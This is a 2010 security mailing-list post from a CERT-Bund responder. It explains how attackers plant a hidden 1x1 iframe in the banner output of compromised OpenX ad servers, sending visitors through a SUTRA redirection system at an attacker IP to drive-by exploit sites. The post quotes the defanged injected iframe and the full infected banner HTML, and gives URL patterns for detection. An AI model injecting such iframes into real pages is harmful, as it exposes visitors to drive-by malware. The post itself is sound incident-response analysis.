[nsp-sec] iframe on OpenX server: similar experiences exploit experiences with AS6851

Thomas Hungenberg th.lab at hungenberg.net
Thu Aug 19 07:46:47 EDT 2010


Carles Fragoso schrieb:
> Sorry ... what's SUTRA?

SUTRA TDS is a traffic redirection system.
Some info here (Google translation):
http://translate.google.de/translate?sl=ru&tl=en&u=http://www.kytoon.com/sutra-tds.html

It's a popular tool to redirect users from injected IFRAMEs to different drive-by-exploit sites.
I haven't seen a legit use of SUTRA yet...

SUTRA URLs usually end in '.../tds/in.cgi?default' or '.../tds/in.cgi?[0-9]'


> Interesting ... thanks for the feedback. It would be great to find which is the way they are taking profit of append function.

The banner code delivered by OpenX looks like:
---------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' [...]
<img src='http://openx.server.tld/www/images/b6a45697ed960c91569.jpg' width='180' height='120' alt='' title='' border='0' /></a>
<div id='beacon_db403b7c44' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'>
<img src='http://openx.server.tld/www/delivery/lg.php?bannerid=12&campaignid=8&zoneid=3&cb=db402b7c44'
 width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>
---------------------

On compromised OpenX servers, the attackers install an append function with code like this:
---------------------
<iframe src="h[XX]p://85.234.190.62/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
---------------------

So the banner code for several campaigns delivered by the OpenX server on sp.fcbarcelona.cat
looked like this on Tuesday:
---------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' [...]
<img src='http://openx.server.tld/www/images/b6a45697ed960c91569.jpg' width='180' height='120' alt='' title='' border='0' /></a>
<div id='beacon_db403b7c44' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'>
<img src='http://openx.server.tld/www/delivery/lg.php?bannerid=12&campaignid=8&zoneid=3&cb=db402b7c44'
 width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
<iframe src="h[XX]p://85.234.190.62/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</body>
</html>
---------------------


Hope this helps.


     - Thomas

CERT-Bund Incident Response & Anti-Malware Team




More information about the nsp-security mailing list